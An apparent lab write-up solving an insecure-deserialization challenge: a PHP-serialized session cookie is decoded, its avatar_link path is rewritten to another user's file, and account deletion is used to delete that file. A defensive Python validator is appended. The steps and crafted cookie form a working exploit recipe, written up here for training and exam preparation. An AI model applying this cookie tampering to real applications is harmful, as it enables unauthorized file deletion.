(Labs 1 and 2 are skipped because their contents are easy. The main purpose of this practice is to prepare myself for the OSWE exam.)

Lab 3: Using application functionality to exploit insecure deserialization

Intro

This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos’s home directory.
You can access your own account using the following credentials: wiener:peter
You also have access to a backup account: gregg:rosebud

Solution

  1. Notice the session cookie set on the “My Account” page after login:

    Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJOWDVsc21ucVI5TWZTb2wwQVZIRTRRbU40R3lsYW9yZSI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d
  2. URL-decode and base64-decode the cookie (it is a PHP-serialized User object):

    O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"NX5lsmnqR9MfSol0AVHE4QmN4Gylaore";s:11:"avatar_link";s:19:"users/wiener/avatar";}

    Take note that avatar_link is a file path carried inside the cookie. Meanwhile, the Delete Account button sends a POST request that deletes the current account (and, with it, the avatar file referenced by avatar_link). To delete the morale.txt file from Carlos's home directory, it is clear that crafting the cookie and then deleting the account is one possible way.

  3. Craft the cookie. The backup account gregg is used so that wiener is not deleted; note that each s:N: length prefix must match the new string length exactly (5 for gregg, 23 for the path), otherwise unserialize() fails:

    O:4:"User":3:{s:8:"username";s:5:"gregg";s:12:"access_token";s:32:"OsTWRNgOgwIgdfjwDk6SgFT5iKZTbHx8";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
    

    Encode it with base64:

    Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjU6ImdyZWdnIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI6Ik9zVFdSTmdPZ3dJZ2RmandEazZTZ0ZUNWlLWlRiSHg4IjtzOjExOiJhdmF0YXJfbGluayI7czoyMzoiL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO30=
  4. Replace the session cookie with the crafted one when deleting the account.
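As an added example (not part of the original write-up or of the lab's code), the following Python parser reads the flat PHP-serialized User object from the cookie above and applies the server-side check the lab's application is missing: avatar_link must be a relative path inside the user's own avatar directory. The legitimate wiener object passes, the tampered object from step 3 is rejected, and a length prefix that does not match the string is rejected at parse time. The real fix is to integrity-protect (sign) the session cookie so a modified object is never unserialized at all; the path check is a second line of defence.

```python
import base64
import re
from urllib.parse import unquote

# Session cookie for wiener exactly as shown on this page (URL-encoded base64).
WIENER_COOKIE = ("Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNz"
                 "X3Rva2VuIjtzOjMyOiJOWDVsc21ucVI5TWZTb2wwQVZIRTRRbU40R3lsYW9yZSI7czoxMToi"
                 "YXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d")

# Header of the only shape handled here: O:<len>:"<class>":<count>:{ ... }
OBJ_HEADER = re.compile(r'^O:(\d+):"([^"]*)":(\d+):\{')


def _read_string(data: str, pos: int):
    # PHP string: s:<len>:"<value>";  The length prefix is authoritative, so a
    # value whose length disagrees with the prefix is a malformed object.
    # (Assumes ASCII data; PHP counts bytes, not characters.)
    if data[pos:pos + 2] != "s:":
        raise ValueError(f"expected string at offset {pos}")
    colon = data.index(":", pos + 2)
    length = int(data[pos + 2:colon])
    start = colon + 2                      # skip the ':"' after the length
    value = data[start:start + length]
    if data[start + length:start + length + 2] != '";':
        raise ValueError(f"length prefix mismatch at offset {pos}")
    return value, start + length + 2


def parse_php_user(serialized: str) -> dict:
    """Parse a flat object whose members are all strings, e.g. the lab's User."""
    m = OBJ_HEADER.match(serialized)
    if not m or len(m.group(2)) != int(m.group(1)):
        raise ValueError("not a serialized PHP object")
    pos, fields = m.end(), {}
    for _ in range(int(m.group(3))):
        key, pos = _read_string(serialized, pos)
        value, pos = _read_string(serialized, pos)
        fields[key] = value
    if serialized[pos:] != "}":
        raise ValueError("trailing data or missing closing brace")
    return {"class": m.group(2), "fields": fields}


def decode_session(cookie: str) -> dict:
    return parse_php_user(base64.b64decode(unquote(cookie)).decode("ascii"))


def avatar_link_is_safe(user: dict) -> bool:
    # The check the vulnerable app lacks: the path must be relative, contain no
    # '..' segment, and live under the requesting user's own avatar directory.
    fields = user["fields"]
    link = fields.get("avatar_link", "")
    return (not link.startswith("/") and ".." not in link.split("/")
            and link.startswith(f"users/{fields.get('username', '')}/"))
```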